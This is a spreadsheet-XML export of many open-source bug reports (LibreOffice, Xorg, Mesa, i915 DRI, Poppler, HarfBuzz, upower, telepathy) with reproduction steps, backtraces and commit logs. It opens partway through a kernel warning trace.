ptp thermal pps_core wmi battery tpm_tis dell_rbtn parport_pc tpm
parport dell_smo8800 rfkill fjes processor button video ac
sch_fq_codel vboxnetflt(O) vboxnetadp(O) pci_stub vboxpci(O)
vboxdrv(O) ip_tables x_tables ext4 crc16 mbcache jbd2 sr_mod cdrom
sd_mod hid_generic usbhid hid atkbd libps2 ahci libahci libata
scsi_mod sdhci_pci xhci_pci ehci_pci sdhci led_class ehci_hcd xhci_hcd
mmc_core usbcore usb_common i8042
[40605.031243] serio
[40605.031246] CPU: 0 PID: 524 Comm: Xorg Tainted: G W O 4.4.5-1-ARCH #1
[40605.031247] Hardware name: Dell Inc. Latitude E5440/0C4F9T BIOS
A12 05/19/2015
[40605.031249] 0000000000000286 000000000340055a ffff88021314fb20
ffffffff812cb391
[40605.031251] ffff88021314fb68 ffffffffa082c1c8 ffff88021314fb58
ffffffff810776e2
[40605.031253] ffff8800ba49e000 ffff880089755400 ffff880213319000
ffff88008945e400
[40605.031255] Call Trace:
[40605.031260] [] dump_stack+0x63/0x82
[40605.031264] [] warn_slowpath_common+0x82/0xc0
[40605.031266] [] warn_slowpath_fmt+0x5c/0x80
[40605.031278] [] intel_atomic_commit+0x61e/0x1430 [i915]
[40605.031284] [] ? drm_atomic_check_only+0x18e/0x590 [drm]
[40605.031289] [] drm_atomic_commit+0x37/0x60 [drm]
[40605.031292] []
drm_atomic_helper_set_config+0x76/0xb0 [drm_kms_helper]
[40605.031299] []
drm_mode_set_config_internal+0x62/0x100 [drm]
[40605.031304] [] drm_mode_setcrtc+0x3d2/0x4f0 [drm]
[40605.031309] [] drm_ioctl+0x152/0x540 [drm]
[40605.031314] [] ? drm_mode_setplane+0x1b0/0x1b0 [drm]
[40605.031317] [] do_vfs_ioctl+0x298/0x480
[40605.031319] [] ? __set_task_blocked+0x41/0xa0
[40605.031321] [] ? __fget+0x77/0xb0
[40605.031323] [] SyS_ioctl+0x79/0x90
[40605.031325] [] ? SyS_rt_sigprocmask+0x8e/0xc0
[40605.031328] [] entry_SYSCALL_64_fastpath+0x12/0x6d
[40605.031329] ---[ end trace 909344e33a4c649f ]---</t>
  </si>
  <si>
    <t>discord</t>
  </si>
  <si>
    <t>LIBREOFFICE-76741</t>
  </si>
  <si>
    <t>FILESAVE: DOCX Table Width Type and Alignment is not preserved</t>
  </si>
  <si>
    <t>Steps to Reproduce:
1. Open file in LO.
2. Save as DOCX
3. Open the original file and the round tripped file in MS Word 2010
Notice that the table Width and alignment is not preserved
There are two issue related to table in the RT file
- the table alignment in RT is left instead of center
- the table width in properties is auto instead of dxa</t>
  </si>
  <si>
    <t>LIBREOFFICE-58865</t>
  </si>
  <si>
    <t>Hardcoded product name in UI string</t>
  </si>
  <si>
    <t>String 1I_3 (description: STR_QUERY_FORMULA_RECALC_ONLOAD_ODS ) in the English version has a hard-coded Product Name:
This document was last saved by application other than LibreOffice.  Some formula cells may produce different results when recalculated.
Assuming that the relevant code compares with [ProductName] and not with a literal LibreOffice [ProductName] should be used here too. On the other hand if the code compares with a literal LibreOffice it should probably be fixed (at least the behaviour should remain the same if I set [ProductName] to something else).
[Found during Italian translations for version 4.0]</t>
  </si>
  <si>
    <t>andrea.for.lists</t>
  </si>
  <si>
    <t>LIBREOFFICE-31131</t>
  </si>
  <si>
    <t>Videos do not play on slides with Design layouts</t>
  </si>
  <si>
    <t>Windows XP x86
LibreOffice 3.3 beta 2
I've been making some presentation and encountered this bug:
Create new Blank slide with no pre-made blocks (aka 'click to add content')
Insert some video into this slide (AVI)
Start presentation
Okay video plays fine
Now apply any other slide design from the right pane
Our video will go inside one of those pre-made blocks automatically
If you start presentation now it will not play... It only displays some random frame from the beginning of the video.
Same happens if you add some video to the slide with some pre-made blocks...</t>
  </si>
  <si>
    <t>eliotfur</t>
  </si>
  <si>
    <t>XORG-26974</t>
  </si>
  <si>
    <t>[i915] OOPS in intel_crt_detect() after suspend/hibernate</t>
  </si>
  <si>
    <t>Created attachment 33881
Xorg.0.log
I've been experiencing freezes after suspend and hibernate for a long time (see  Bug 15187). Current drm-intel-next branch (2.6.33-997) has fixed warning messages but the freeze seems to have become a crash now.
I'm attaching Xorg.0.log :0.log. A particularly interesting line is in :0.log:
X: ../../src/i830_batchbuffer.h:79: intel_batch_emit_dword: Assertion `pI830-&gt;batch_ptr != ((void *)0)' failed.
Excerpt from lspci -vnn:
00:02.1 Display controller [0380]: Intel Corporation Mobile 915GM/GMS/910GML Express Graphics Controller [8086:2792] (rev 03)
        Subsystem: Toshiba America Info Systems Device [1179:ff00]
        Control: I/O- Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx-
        Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- SERR- &lt;PERR- INTx-
        Region 0: Memory at 64000000 (32-bit non-prefetchable) [disabled] [size=512K]
        Capabilities: [d0] Power Management version 2
                Flags: PMEClk- DSI+ D1- D2- AuxCurrent=0mA PME(D0-D1-D2-D3hot-D3cold-)
                Status: D0 PME-Enable- DSel=0 DScale=0 PME-
Please just ask if you want more information.</t>
  </si>
  <si>
    <t>HAL-11170</t>
  </si>
  <si>
    <t>Chinese MP3 Player PID/VID addition</t>
  </si>
  <si>
    <t>Another variant of the good old MPMan which I've recently acquired with PID 0x1101. Same abilities as the PID 0x1100 one.
Also updated the PID 0x1100 one with the proper folder_depth (tested - 1 folder depth is supported 2 folder depths are not).</t>
  </si>
  <si>
    <t>LIBREOFFICE-39886</t>
  </si>
  <si>
    <t>Base appears on Windows 7 start menu rather than any other component</t>
  </si>
  <si>
    <t>When installing on Windows 7 Libre Office adds itself to the start menu which is fine and right. But instead of adding Writer or libre office to the most-used program list it adds Libre Office base surely the least used part of the suite.
If you start with a completely empty start menu it adds all components. But few people have that. Assuming that there is only one slot at the bottom of the most used program list it will add base and to the extent that there are other slots it adds components in alphabetical order. 
My suggested fix would be either to add things in reverse alphabetical order or to use the main Libre Office start item.</t>
  </si>
  <si>
    <t>seatrout</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-16062</t>
  </si>
  <si>
    <t>New gpg key for my fdo account.</t>
  </si>
  <si>
    <t>Created attachment 16681
My new gpg key for account tvermeir
Hello
Can someone attach my new gpg key to my account?
account: tvermeir
Thanks</t>
  </si>
  <si>
    <t>XORG-12528</t>
  </si>
  <si>
    <t>Server crashes when receiving high key codes from evdev</t>
  </si>
  <si>
    <t>I'm using xorg-server 1.4 with xf86-input-evdev master (with AllowEmptyInput and devices configured via HAL) on Linux x86_64. Pressing the Zoom In or the Zoom Out key on my keyboard crashes the server.
The KEY_ZOOMIN / KEY_ZOOMOUT linux input events have the keycodes 0x1a2 and 0x1a3 resp. I'd guess that the crash happens because of the high keycode used as array index in GetKeyboardValuatorEvents() without range check.
Backtrace:
0: /usr/bin/Xorg(xf86SigHandler+0x6a) [0x48b01a]
1: /lib/libc.so.6 [0x2b9414c72790]
2: /usr/bin/Xorg(GetKeyboardValuatorEvents+0x4c) [0x45b7dc]
3: /usr/bin/Xorg(GetKeyboardEvents+0x17) [0x45bae7]
4: /usr/bin/Xorg(xf86PostKeyboardEvent+0x63) [0x478e93]
5: /usr/lib/xorg/modules/input//evdev_drv.so [0x2b94191daf3a]
6: /usr/bin/Xorg [0x48b11f]
7: /usr/bin/Xorg [0x47050c]
8: /lib/libc.so.6 [0x2b9414c72790]
9: /lib/libc.so.6(__select+0x13) [0x2b9414cfbb43]
10: /usr/bin/Xorg(WaitForSomething+0x6db) [0x55be7b]
11: /usr/bin/Xorg(Dispatch+0x8b) [0x44bdcb]
12: /usr/bin/Xorg(main+0x47c) [0x4348cc]
13: /lib/libc.so.6(__libc_start_main+0xf4) [0x2b9414c5fac4]
14: /usr/bin/Xorg(FontFileCompleteXLFD+0x259) [0x433c09]</t>
  </si>
  <si>
    <t>MESA-25930</t>
  </si>
  <si>
    <t>[softpipe] piglit glsl-vs-mov-after-deref fails</t>
  </si>
  <si>
    <t>Created attachment 32484
glsl-vs-mov-after-deref.png
mesa: 6f498a7eff26dc055c0a1f75ce3102aa4a1a0141 (master)
Run piglit glsl-vs-mov-after-deref test.
$ bin/glsl-vs-mov-after-deref
error: tgsi_emit_sse2() failed falling back to interpreter
Probe at (1515)
  Expected: 0.000000 1.000000 0.000000
  Observed: 0.000000 0.000000 0.000000</t>
  </si>
  <si>
    <t>UPOWER-87791</t>
  </si>
  <si>
    <t>after resume from hibernate critical battery action (hibernate) does not work anymore</t>
  </si>
  <si>
    <t>I am not sure if the cause of this problem is related to upower systemd or the patches (see note below) I have installed. 
Steps to reproduce:
1. restart upowerd
2. wait until battery is critical: computer hibernates as expected.
3. charge computer (or start while connected to power)
4. wait until battery is fully charged (not sure if the battery needs to be fully charged to trigger )
5. unplug power
6. wait until battery is critical: computer does not hibernate!
7. charge and start computer: computer does not resume from hibernate!
Workarround: restart upowerd. I have now a systemd.timer which does this for me every hour to ensure not loosing any session-data when battery is critical.
Note: I have this issue on a gentoo-box (Thinkpad X1 2012-edition) with version upower-0.99.1-r1 (r1 means I have aplied the patches from bug https://bugs.freedesktop.org/show_bug.cgi?id=82925)
How can I be of help with further debugging of this problem? Is there a way to log things happening when battery enters critical state? Recompile with additional flags etc?</t>
  </si>
  <si>
    <t>ich</t>
  </si>
  <si>
    <t>LIBREOFFICE-40529</t>
  </si>
  <si>
    <t>Overlap in line end marker is to large</t>
  </si>
  <si>
    <t>Created attachment 50777
Config file with new line end markers
I want to design some unfilled line end markers lilke those used in UML diagrams.With those markers I notice that the overlap of the line with the marker is to large. You can see part of the lines inside the marker. With filled markers this has been no problem but with unfilled markers it becomes visible.
Copy the attached UML.soe in your user/config folder. Then open the attached document 'LineEndMarker.od'. It shows some of those markers. The right line end is not centered the left line end is centered.
Because you cannot make the solution dependent on the marker there is no general 'best' solution. But for the most cases a smaller overlap would be better. I suggest to use an overlap of 'marker width'/15. For an often used marker width of 0.3cm this would result in 002cm overlap. Such overlap would be a good compromise for non-filled markers. The attached file UML.soe contains markers with 0.02cm line width for 0.3cm marker width.</t>
  </si>
  <si>
    <t>MESA-51099</t>
  </si>
  <si>
    <t>Unigine Heaven demo will hang at loading interface</t>
  </si>
  <si>
    <t>System Environment:
--------------------------
Libdrm:	(master)libdrm-2.4.35-10-gd1fcfb17b9642ae351b03056a27b328f314ca80a
Mesa:	(master)ae419a0159eeba6138d8c72a54737190cb6b1626
Xserver:(master)xorg-server-1.12.0-200-g812786f4d4306cb16f8ed57fa4a1a32bb1d13fe3
Xf86_video_intel:(master)2.19.0-248-g572745eb243a96819c8fa248f4ffdd703ed13b0f
Cairo:	(master)dbc0efad7e565558a3abf7f69d7675efddc4688d
Libva:	(staging)f12f80371fb534e6bbf248586b3c17c298a31f4e
Libva_intel_driver:	(staging)82fa52510a37ab645daaa3bb7091ff5096a20d0b
Kernel:	(drm-intel-next-queued) 8ecd1a6615f0d9de6759aafe229bc1cc4ee99c7b
Bug detailed description:
---------------------------
It will be hang at loading interface after enter into Unigine Heaven 3.0 and hit run button.
Reproduce steps:
----------------------------
1.xinit&amp;
2.gnome-session
3../heaven</t>
  </si>
  <si>
    <t>XORG-19712</t>
  </si>
  <si>
    <t>exa: composite: driver ignores repeatType attribute</t>
  </si>
  <si>
    <t>XRender supports four possible repeat types: RepeatNone RepeatNormal RepeatPad and RepeatReflect.  The driver currently only handles the first two so it should fall back to software when it encounters RepeatPad or RepeatReflect.  This is currently forcing cairo to use slow client-side rendering thus preventing firefox from enabling bilinear filtering on linux.</t>
  </si>
  <si>
    <t>DRI-21271</t>
  </si>
  <si>
    <t>[G33][KMS] Xserver locks up when using Xv</t>
  </si>
  <si>
    <t>Created attachment 24921
Xorg.0.log
Xserver locks up whenerver I try to play a video using Xv using totem or gxine. With mplayer -vo xv playback works until I change to fullscreen mode. It is impossible to switch to a Console with Ctrl-Alt-F1 even after killing the X-Server with Alt-SysRq-K. This happens only with KMS enabled. Video playback using Xv with UXA and KMS *disabled* works fine.
System environment:
-- chipset: G33
-- system architecture: 64-bit
-- xf86-video-intel: 2.7.0
-- xserver: 1.6.1
-- mesa: 7.4
-- libdrm: 2.4.9
-- kernel: 2.6.30-rc2
-- Linux distribution: Debian squeeze/sid
-- Machine or mobo model: Intel DG33TL
-- Display connector: DVI</t>
  </si>
  <si>
    <t>bjoern.heide</t>
  </si>
  <si>
    <t>LIBREOFFICE-37160</t>
  </si>
  <si>
    <t>Application Icon not availabe in system application menu</t>
  </si>
  <si>
    <t>Platform: SLED 11 sp1 i586
build info: Libreoffice 3.4 beta5
[Steps]
    1. Install LibO 3.4 beta5
    2. Reset the system and login
    3. Launch system application menu
[Problem]
    Notice the icon in the application panel are red crosses:
    It looks the 'Icon' section in xdg directory need update:
        base.desktop
        calc.desktop
        draw.desktop
        impress.desktop
        javafilter.desktop
        math.desktop
        printeradmin.desktop
        qstart.desktop
        startcenter.desktop
        writer.desktop
[Extra Information]
    - It is probably caused by the updating of icon name</t>
  </si>
  <si>
    <t>LIBREOFFICE-50833</t>
  </si>
  <si>
    <t>SLIDESHOW: Custom Animations doesn't repeat</t>
  </si>
  <si>
    <t>Problem description: 
Steps to reproduce:
1. Create arbitrary object for example a simple text
2. Add custom animation which is able to be repeated for example blink
3. Edit Effect Options / Timing / Repeat
4. Set value to any value different to 1
Current behavior: Animation is repeated once
Expected behavior: Animation should be repeated as set
Platform (if different from the browser): Linux / Fedora 17
Browser: Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/536.5 (KHTML like Gecko) Chrome/19.0.1084.52 Safari/536.5</t>
  </si>
  <si>
    <t>dbraunwarth</t>
  </si>
  <si>
    <t>MESA-43771</t>
  </si>
  <si>
    <t>[i915g] src/gallium/auxiliary/gallivm/lp_bld_sample_aos.c:821:lp_build_sample_mipmap: Assertion `img_filter == 1' failed.</t>
  </si>
  <si>
    <t>mesa: 23895cc006f3dbf96a502ddd15e291e071aff25a (master)
Run piglit fragment-and-vertex-texturing on i915g. The test triggers an assert on i915g but passes on llvmpipe.
$ ./bin/fragment-and-vertex-texturing -autoThe result should be a solid block of half-bright yellow color
src/gallium/auxiliary/gallivm/lp_bld_sample_aos.c:821:lp_build_sample_mipmap: Assertion `img_filter == 1' failed.
Trace/breakpoint trap (core dumped)
(gdb) bt
#0  0x01131e18 in _debug_assert_fail (expr=0x1ac1858 img_filter == 1 file=0x1ac1824 src/gallium/auxiliary/gallivm/lp_bld_sample_aos.c line=821 
    function=0x1ac19d1 lp_build_sample_mipmap) at src/gallium/auxiliary/util/u_debug.c:278
#1  0x011bddd1 in lp_build_sample_mipmap (bld=0xbfa61d08 img_filter=2 mip_filter=2 s=0x866a61c t=0x866a2ec r=0x862a480 ilevel0=0x866f4d4 ilevel1=0x0 
    lod_fpart=0x0 colors_lo_var=0x8665344 colors_hi_var=0x85e570c) at src/gallium/auxiliary/gallivm/lp_bld_sample_aos.c:821
#2  0x011be85f in lp_build_sample_aos (bld=0xbfa61d08 unit=0 s=0x866a61c t=0x866a2ec r=0x862a480 ddx=0xbfa61f40 ddy=0xbfa61f4c lod_bias=0x0 
    explicit_lod=0x866b224 texel_out=0xbfa61fb0) at src/gallium/auxiliary/gallivm/lp_bld_sample_aos.c:1067
#3  0x011a89ae in lp_build_sample_soa (gallivm=0x8431fb8 static_state=0x86654d4 dynamic_state=0x8664490 type=... unit=0 num_coords=2 
    coords=0xbfa61f34 ddx=0xbfa61f40 ddy=0xbfa61f4c lod_bias=0x0 explicit_lod=0x866b224 texel_out=0xbfa61fb0)
    at src/gallium/auxiliary/gallivm/lp_bld_sample_soa.c:1253
#4  0x0116fe1f in draw_llvm_sampler_soa_emit_fetch_texel (base=0x8664488 gallivm=0x8431fb8 type=... unit=0 num_coords=2 coords=0xbfa61f34 
    ddx=0xbfa61f40 ddy=0xbfa61f4c lod_bias=0x0 explicit_lod=0x866b224 texel=0xbfa61fb0) at src/gallium/auxiliary/draw/draw_llvm_sample.c:186
#5  0x011aceb4 in emit_tex (bld=0xbfa62060 inst=0x86b6a98 modifier=LP_BLD_TEX_MODIFIER_EXPLICIT_LOD texel=0xbfa61fb0)
    at src/gallium/auxiliary/gallivm/lp_bld_tgsi_soa.c:1145
#6  0x011b06e5 in emit_instruction (bld=0xbfa62060 inst=0x86b6a98 info=0x1d949e0 pc=0xbfa64758) at src/gallium/auxiliary/gallivm/lp_bld_tgsi_soa.c:2169
#7  0x011b13c9 in lp_build_tgsi_soa (gallivm=0x8431fb8 tokens=0x8680678 type=... mask=0x0 consts_ptr=0x866bfcc system_values_array=0x86648a4 pos=0x0 
    inputs=0xbfa64aac outputs=0xbfa648ac sampler=0x8664488 info=0x865abd8) at src/gallium/auxiliary/gallivm/lp_bld_tgsi_soa.c:2498
#8  0x0116c2e7 in generate_vs (llvm=0x848a6c8 builder=0x848a690 outputs=0xbfa648ac inputs=0xbfa64aac system_values_array=0x86648a4 
    context_ptr=0x86260a8 draw_sampler=0x8664488 clamp_vertex_color=1 '\001') at src/gallium/auxiliary/draw/draw_llvm.c:492
#9  0x0116ef0a in draw_llvm_generate (llvm=0x848a6c8 variant=0x8665490 elts=0 '\000') at src/gallium/auxiliary/draw/draw_llvm.c:1348
#10 0x0116c13e in draw_llvm_create_variant (llvm=0x848a6c8 num_inputs=3 key=0xbfa65078) at src/gallium/auxiliary/draw/draw_llvm.c:447
#11 0x01171d71 in llvm_middle_end_prepare (middle=0x8494c50 in_prim=7 opt=3 max_vertices=0x849204c)
    at src/gallium/auxiliary/draw/draw_pt_fetch_shade_pipeline_llvm.c:174
#12 0x01115ec2 in vsplit_prepare (frontend=0x8492030 in_prim=7 middle=0x8494c50 opt=3) at src/gallium/auxiliary/draw/draw_pt_vsplit.c:175
#13 0x0110bbaf in draw_pt_arrays (draw=0x84333f8 prim=7 start=0 count=4) at src/gallium/auxiliary/draw/draw_pt.c:111
#14 0x0110c746 in draw_vbo (draw=0x84333f8 info=0xbfa65494) at src/gallium/auxiliary/draw/draw_pt.c:501
#15 0x010d7a48 in i915_draw_vbo (pipe=0x84388d0 info=0xbfa65494) at src/gallium/drivers/i915/i915_context.c:88
#16 0x0195b45f in st_draw_vbo (ctx=0x84d1538 arrays=0x852aa00 prims=0xbfa6553c nr_prims=1 ib=0x0 index_bounds_valid=1 '\001' min_index=0 max_index=3)
    at src/mesa/state_tracker/st_draw.c:1058
#17 0x019ee5ff in vbo_draw_arrays (ctx=0x84d1538 mode=7 start=0 count=4 numInstances=1) at src/mesa/vbo/vbo_exec_array.c:620
#18 0x019ee757 in vbo_exec_DrawArrays (mode=7 start=0 count=4) at src/mesa/vbo/vbo_exec_array.c:651
#19 0x0809612e in piglit_draw_rect (x=-1 y=-1 w=2 h=2) at piglit/tests/util/piglit-util-gl.c:647
#20 0x0806c960 in display () at piglit/tests/texturing/fragment-and-vertex-texturing.c:147
#21 0x0806c9ab in piglit_display () at piglit/tests/texturing/fragment-and-vertex-texturing.c:163
#22 0x0806d053 in display () at piglit/tests/util/piglit-framework.c:56
#23 0x00a75c1e in fghRedrawWindow (window=0x8430a38) at freeglut_main.c:210
#24 fghcbDisplayWindow (window=0x8430a38 enumerator=0xbfa65778) at freeglut_main.c:227
#25 0x00a79590 in fgEnumWindows (enumCallback=0xa75b20  enumerator=0xbfa65778) at freeglut_structure.c:394
#26 0x00a7602e in fghDisplayAll () at freeglut_main.c:249
#27 glutMainLoopEvent () at freeglut_main.c:1450
#28 0x00a76935 in glutMainLoop () at freeglut_main.c:1498
#29 0x0806d78a in main (argc=1 argv=0xbfa659e4) at piglit/tests/util/piglit-framework.c:294
(gdb) frame 1
#1  0x011bddd1 in lp_build_sample_mipmap (bld=0xbfa61d08 img_filter=2 mip_filter=2 s=0x866a61c t=0x866a2ec r=0x862a480 ilevel0=0x866f4d4 ilevel1=0x0 
    lod_fpart=0x0 colors_lo_var=0x8665344 colors_hi_var=0x85e570c) at src/gallium/auxiliary/gallivm/lp_bld_sample_aos.c:821
821	      assert(img_filter == PIPE_TEX_FILTER_LINEAR)
(gdb) l
816	                                    row_stride0_vec img_stride0_vec
817	                                    data_ptr0 s t r
818	                                    
819	   }
820	   else {
821	      assert(img_filter == PIPE_TEX_FILTER_LINEAR)
822	      lp_build_sample_image_linear(bld
823	                                   size0
824	                                   row_stride0_vec img_stride0_vec
825	                                   data_ptr0 s t r</t>
  </si>
  <si>
    <t>POPPLER-79874</t>
  </si>
  <si>
    <t>qt frontend</t>
  </si>
  <si>
    <t>Compilation of Qt5 frontend fails with MinGW</t>
  </si>
  <si>
    <t>Created attachment 100797
Proposed patch for the problem
When trying to cross-compile Poppler with MinGW the compilation fails because of an error in the Qt5 frontend. The error is:
qt5/src/poppler-private.h:91:21: error: 'std::wstring' has no member named '_Copy_s'
   int length = wstr._Copy_s(fileName filePath.length() filePath.length())
That's caused because of usage of Microsoft specific API.
A proposed patch is attached.</t>
  </si>
  <si>
    <t>LIBREOFFICE-85584</t>
  </si>
  <si>
    <t>Sorting: option UpdateReferenceOnSort should be set to false by default</t>
  </si>
  <si>
    <t>According to many discussions on bugs 81309 81633 85215 and 85490 and others I think that for a better backward compatibility the configuration option UpdateReferenceOnSort should be set to false by default. 
Use-Cases collected in bug 85490 seems to shows that the cases where the value false in required are more frequent than the case where the value true is needed.
Best regards. JBF</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-13079</t>
  </si>
  <si>
    <t>link to dri wiki</t>
  </si>
  <si>
    <t>There's a link under dev docs but since the dri wiki has end-user stuff it should more prominently linked on the front page (which I can not edit).</t>
  </si>
  <si>
    <t>DBUS-15430</t>
  </si>
  <si>
    <t>ABI break if compiled against a recent libdbus</t>
  </si>
  <si>
    <t>The enum values in dbus-glib-error-enum.h got reordered breaking
ABI compat. You either have to add at the end (causing a fair
amount of pain for distros) bump the soname.</t>
  </si>
  <si>
    <t>HARFBUZZ-93274</t>
  </si>
  <si>
    <t>hb_ot_map_builder_t::feature_info_t::cmp triggers undefined behavior</t>
  </si>
  <si>
    <t>hb_ot_map_builder_t::feature_info_t::cmp function returns 1 for equal arguments. This violates requirements to qsort's comparison function (which must be a total ordering) and causes UB at runtime. In practice this may mean strange runtime misbehaviors.
The issue can be easily fixed by prepending a-&gt;seq == b-&gt;seq ? 0 : to a-&gt;seq seq ? -1 : 1 to a-&gt;seq seq ? -1 : 1.
This seems to be the only comparison function in HarfBazz which have such problems.</t>
  </si>
  <si>
    <t>tetra2005</t>
  </si>
  <si>
    <t>XORG-8023</t>
  </si>
  <si>
    <t>[ATI mobility 9600/M10] Display sometimes comes up with scrambled (ghost) image</t>
  </si>
  <si>
    <t>When X is started (or swithing to/back from virtual terminal) screen sometimes
gets scrambled (see images attached). Switching (again) to virtual terminal and
back fixes the problem. 
Hardware is HP nw8000 laptop with ATI Radeon mobility 9600 / M10 with 1600x1200
display.
This is a minor issue but user who doensn't know how to switch to VT's might
need to reboot the computer everytime this happens. 
This is not a new issue it has been around for awhile.</t>
  </si>
  <si>
    <t>mkorkeal</t>
  </si>
  <si>
    <t>MESA-39942</t>
  </si>
  <si>
    <t>[llvmpipe] piglit glsl-arb-fragment-coord-conventions regression</t>
  </si>
  <si>
    <t>Created attachment 50041
glsl-arb-fragment-coord-conventions.png
mesa: c148ef6ddb3dbf256c26d82ed2f45f1fde55a231 (master)
$ ./bin/glsl-arb-fragment-coord-conventions
Regular gl_FragCoord
Probe at (00)
  Expected: 0.000000 0.000000 0.000000
  Observed: 0.003922 0.015686 0.003922
Pixel center half integer
Pixel center integer
Pixel origin upper left
Pixel origin upper left and pixel center integer
Regression is introduced with glsl-to-tgsi merge.
d7f2e38fca38a5521e930242be46be5a70a9cbd3 - bad
50073563b2bfe3716b3dc8b1ed2f91381ba24305 - good
commit d7f2e38fca38a5521e930242be46be5a70a9cbd3
Author: Brian Paul 
Date:   Thu Aug 4 15:55:13 2011 -0600
    mesa: add st_glsl_to_tgsi.cpp to Sconscript
commit 1c8d079e205919b24e04efdc2421c18d03f078ff
Author: Brian Paul 
Date:   Thu Aug 4 15:32:09 2011 -0600
    mesa: fix out of bounds array access in rtgc debug code
    Fixes https://bugs.freedesktop.org/show_bug.cgi?id=39841
    This would only be hit if someone set RGTC_DEBUG=1.
commit d6a0692f9dc055c5e5f0e7c806537ad24aa13709
Author: Brian Paul 
Date:   Thu Aug 4 13:07:50 2011 -0600
    mesa: don't use K&amp;R style function pointer calls
commit 4683529048ee133481b2d8f1cae1685aa1736f9a
Merge: 5007356 9adcab9
Author: Bryan Cain 
Date:   Thu Aug 4 15:43:34 2011 -0500
    Merge branch 'glsl-to-tgsi'
    Conflicts:
        src/mesa/state_tracker/st_atom_pixeltransfer.c
        src/mesa/state_tracker/st_program.c
commit 9adcab9cd464d659288e31e6767efb5dee3894ff
Author: Bryan Cain 
Date:   Thu Aug 4 10:15:54 2011 -0500
    st/mesa: replace duplicated create_color_map_texture() function with shared function
commit b7e89115310628310bf458a33f2df2bf23384cf3
Author: Bryan Cain 
Date:   Tue Aug 2 11:36:44 2011 -0500
    glsl_to_tgsi: remove debugging printf
commit 50073563b2bfe3716b3dc8b1ed2f91381ba24305
Author: Brian Paul 
Date:   Thu Aug 4 08:22:31 2011 -0600
    st/mesa: silence int/float and double/float conversion warnings</t>
  </si>
  <si>
    <t>bryancain3+fdo</t>
  </si>
  <si>
    <t>DRI-99929</t>
  </si>
  <si>
    <t>[i915] Black/gray screen with kernel 4.9.3</t>
  </si>
  <si>
    <t>For further info see https://bugzilla.redhat.com/show_bug.cgi?id=1398362
When booting 4.9.3 kernel  gdm starts with a black/gray screen. Some bisecting gave the results below.
I found that 4.9.3 kernel (from linux-stable) after reverting commit 0ce140d45a8398b501934ac289aef0eb7f47c596 the problem is fixed. Relevant output from the logs (4.9.3-1-g17a6527 is the one with the reverted patch):
Command line: BOOT_IMAGE=/vmlinuz-4.9.3-1-g17a6527+ root=/dev/mapper/vg0-root ro rd.auto=1
Command line: BOOT_IMAGE=/vmlinuz-4.9.3 root=/dev/mapper/vg0-root ro rd.auto=1
[drm:intel_cpu_fifo_underrun_irq_handler [i915]] *ERROR* CPU pipe A FIFO underrun</t>
  </si>
  <si>
    <t>anders.blomdell</t>
  </si>
  <si>
    <t>LIBREOFFICE-63786</t>
  </si>
  <si>
    <t>PDF: cropped svg image in writer not cropped when viewed in exported Pdf document.</t>
  </si>
  <si>
    <t>Created attachment 78312
Writer odt file with cropped svg image
Steps to reproduce. 
1. Open niew writer document file
2. Import svg image
3. Crop svg image.
4. Export document as pdf file.
5. File is not cropped in pdf file.</t>
  </si>
  <si>
    <t>m.menheere</t>
  </si>
  <si>
    <t>XORG-2571</t>
  </si>
  <si>
    <t>Cross compile instructions are incorrect</t>
  </si>
  <si>
    <t>The BUILD file says:
To inform the build system where your cross compiler is located use
BOOTSTRAPCFLAGS to set the make variable CROSSCOMPILEDIR.
make World BOOTSTRAPCFLAGS=CROSSCOMPILEDIR=
However this doesn't work for me. See the attached error log for details. Running:
make World CROSSCOMPILEDIR=
...works great though.</t>
  </si>
  <si>
    <t>XORG-1168</t>
  </si>
  <si>
    <t>Damage crashes with rootless layer</t>
  </si>
  <si>
    <t>I am still seeing crashes with the damage extension when using the generic rootless layer. (This bug is 
related to #1032 which is also about damage-rootless incompatibility but is a different problem with a 
different cause.) Here is a sample back trace:
#0  0x001d4ca8 in damageCopyArea (pSrc=0x21ae000 pDst=0x5a94760 pGC=0x5a743a0 srcx=0 
srcy=0 width=5 height=15 dstx=4 dsty=2) at damage.c:744
#1  0x00038ce8 in ProcCopyArea (client=0x5a704f0) at dispatch.c:1758
#2  0x00034868 in Dispatch () at dispatch.c:455
#3  0x0000a624 in main (argc=3 argv=0xbffffb0c envp=0xbffffb1c) at main.c:442
Notice that RootlessCopyArea() is not in the backtrace. This is because the destination drawable is an 
unviewable window. Damage is crashing on checkGCDamage(pDst pGC). Rootless does not do anything 
with windows until they are realized. It looks like Damage is crashing because it is trying to find a valid 
pixmap for an unrealized window. Should Damage be tracking unrealized windows? Any ideas on how 
to resolve this?</t>
  </si>
  <si>
    <t>TELEPATHY-27640</t>
  </si>
  <si>
    <t>telepathy-butterfly crashed with NotAvailable in _invite_initial_invitees()</t>
  </si>
  <si>
    <t>The bug has been opened on https://bugs.launchpad.net/ubuntu/+source/telepathy-butterfly/+bug/561050
I just saw this crash report 
telepathy-butterfly 0.5.8-1
Traceback (most recent call last):
  File /usr/lib/pymodules/python2.6/papyon/switchboard_manager.py line 75 in 
    lambda sb contact: self.__on_user_joined(contact))
  File /usr/lib/pymodules/python2.6/papyon/switchboard_manager.py line 136 in __on_user_joined
    self._on_contact_joined(contact)
  File /usr/lib/pymodules/python2.6/papyon/conversation.py line 335 in _on_contact_joined
    self._dispatch(on_conversation_user_joined contact)
  File /usr/lib/pymodules/python2.6/papyon/event/__init__.py line 44 in _dispatch
    if event_handler._dispatch_event(name *args):
  File /usr/lib/pymodules/python2.6/papyon/event/__init__.py line 65 in _dispatch_event
    handler(*params)
  File /usr/lib/python2.6/dist-packages/butterfly/channel/im.py line 154 in on_conversation_user_joined
    signal=True conversation=None)
  File /usr/lib/python2.6/dist-packages/telepathy/server/channelmanager.py line 120 in channel_for_props
    return self.create_channel_for_props(props signal **args)
  File /usr/lib/python2.6/dist-packages/telepathy/server/channelmanager.py line 105 in create_channel_for_props
    props **args)
  File /usr/lib/python2.6/dist-packages/butterfly/channel_manager.py line 157 in _get_text_channel
    object_path=path)
  File /usr/lib/python2.6/dist-packages/butterfly/channel/conference.py line 62 in __init__
    self._invite_initial_invitees(props ic)
  File /usr/lib/python2.6/dist-packages/butterfly/channel/conference.py line 147 in _invite_initial_invitees
    raise telepathy.NotAvailable('Contact %s not available' % invitee_id)
